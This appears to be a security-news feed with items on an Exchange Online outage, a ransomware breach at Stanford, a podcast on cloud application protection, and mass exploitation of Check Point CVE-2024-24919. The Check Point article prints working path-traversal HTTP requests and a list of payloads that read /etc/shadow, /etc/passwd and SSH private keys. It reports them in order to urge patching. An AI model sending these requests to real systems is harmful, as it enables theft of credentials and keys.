Microsoft is investigating an ongoing Exchange Online outage preventing customers from sending emails and triggering 503 errors on affected systems. […] Read More
BleepingComputer
The all in one place for non-profit security aid.
Microsoft is investigating an ongoing Exchange Online outage preventing customers from sending emails and triggering 503 errors on affected systems. […] Read More
BleepingComputer
Stanford University Hacked – Attackers Breached The Internal Network
[[{“value”:”
Stanford, CA – Stanford University is reaching out to individuals potentially impacted by a recent data security breach within its Department of Public Safety.
The breach, identified as a ransomware attack on September 27, 2023, prompted immediate action from the university, including notifications to law enforcement agencies and initiating a thorough investigation with a leading forensic investigator.
Standford University said that the investigation revealed unauthorized access to the Department of Public Safety’s network from May 12, 2023, until the breach was discovered.
Swift measures were taken to terminate the unauthorized access and secure the network. It is important to note that the incident was isolated to the Department of Public Safety’s systems and did not affect other Stanford networks or systems. Currently, no evidence suggests that any of the accessed information has been misused.
In February 2023, Stanford University reported another data breach following the exposure of admissions information for the Department of Economics Ph.D. program online from December 2022 to January 2023.
The comprehensive forensic investigation has now identified individuals whose information may have been compromised. Stanford is notifying these individuals via mail and providing them with details on complimentary identity protection services.
According to data breach alerts sent to Maine’s Attorney General, the attackers stole papers containing the personally identifiable information (PII) of 27,000 people.
The types of personal information potentially affected include, but are not limited to, dates of birth, Social Security numbers, government IDs, passport numbers, driver’s license numbers, and, in some cases, biometric data, health/medical information, email addresses with passwords, usernames with passwords, security questions and answers, digital signatures, and credit card information with security codes.
The Akira Ransomware group is believed to be behind this attack. They have stated that they took 430Gb of files from Standford University’s Internal systems and are asking for nearly a million dollars in ransom.
The Akira ransomware group, which first appeared in March 2023, has been identified as a serious threat to data security. It encrypts data and demands a ransom for decryption, affecting Windows and Linux devices.
Stanford University takes the privacy and security of community members very seriously and is committed to supporting all those affected. The law enforcement investigation into the incident is ongoing, and Stanford is cooperating fully.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.
The post Stanford University Hacked – Attackers Breached The Internal Network appeared first on Cyber Security News.
“}]] Read More
Cyber Security News
What’s a CNAPP: Cloud-Native Application Protection Platform?
In this episode of CyberWire-X, N2K’s CSO, Chief Analyst, and Senior Fellow, Rick Howard, is joined by Tim Miller, Technical Marketing Engineer for Panoptica, Cisco’s Cloud Application Security solution, (Panoptica is the result of Cisco’s incubation engine (Outshift) for new products and markets), and Kevin Ford, Esri’s CISO. They discuss the complexity reduction need that Cloud-Native Application Protection Platforms (CNAPPs) provide. Outshift by Cisco is our CyberWire-X episode sponsor. Read More
The CyberWire
Huge Surge in Attacks Exploiting Check Point VPN Zero-Day Vulnerability
Check Point published an advisory regarding a critical vulnerability, CVE-2024-24919, which has since seen a surge in exploitation attempts.
The vulnerability, rated with a CVSS score of 8.6, allows attackers to access sensitive information on the Security Gateway, potentially leading to lateral movement and domain admin privileges.
According to Greynoise blogs, the core issue is a path traversal vulnerability.
This vulnerability allows an attacker to access files and directories stored outside the web root folder.
The specific exploit involves sending a crafted POST request to the server, which runs as root. This enables the attacker to grab any file on the filesystem.
The exploit, as reverse-engineered by both Check Point and watchTowr labs, looks like this:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
Check Point’s advisory, although somewhat vague, highlighted the severity of the vulnerability.
Analyze any MaliciousURL, Files & Emails & Configuration With ANY RUN : Start your Analysis
The advisory noted that exploiting this vulnerability could result in accessing sensitive information and potentially lead to domain admin privileges.
However, it was buried deep within the advisory that attacks in the wild had been occurring since April 7, 2024.
Two days after the advisory, on May 30, 2024, watchTowr labs published a detailed write-up, including a working proof of concept.
The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-24919 to its Known Exploited Vulnerabilities list on the same day. By May 31, 2024, exploitation attempts were being observed globally.
Sift, a cybersecurity monitoring tool, tagged the issue quickly. The first exploit attempt was logged on May 30, 2024, although it was a non-working exploit.
The first successful exploitation attempt was recorded on May 31, 2024, at around 9:30 AM UTC. The payload used in these attempts was identical to the proof of concept published by watchTowr labs.
A manual search of honeypot data revealed that the oldest exploit attempts started on May 30, 2024, at about 5 PM UTC.
These attempts, however, did not work, indicating that attackers were still refining their methods.
The first real exploitation was observed on May 31, 2024, from a New York-based IP address.
POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/<IP_ADDRESS> Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 38
/clients/MyCRL/../../../..//etc/passwd
Graph showing the surge in exploitation attempts
As of June 4, 2024, the top-10 list of plausibly-working payloads observed includes:
../../../../../../../etc/fstab – 4805 attempts
../../../../../../../etc/shadow – 2453 attempts
../../../../../../../sysimg/CPwrapper/SU/Products.conf – 980 attempts
../../../../../../../config/db/initial – 959 attempts
../../../../../../../etc/passwd – 508 attempts
../../../../../../../home/*/.ssh/authorized_keys – 202 attempts
../../../../../../../opt/checkpoint/conf/ – 166 attempts
../../../../../../../etc/ssh/sshd_config – 165 attempts
../../../../../../../etc/vpn/vpn.conf – 163 attempts
../../../../../../../home/*/.ssh/id_rsa – 161 attempts
The rapid increase in exploitation attempts following the public disclosure of CVE-2024-24919 underscores the critical need for organizations to patch their systems promptly.
With a public proof of concept available and exploitation ramping up, all affected entities must apply the necessary patches to mitigate this severe vulnerability.
Looking for Full Data Breach Protection? Try Cynet’s All-in-One Cybersecurity Platform for MSPs: Try Free Demo
The post Huge Surge in Attacks Exploiting Check Point VPN Zero-Day Vulnerability appeared first on Cyber Security News.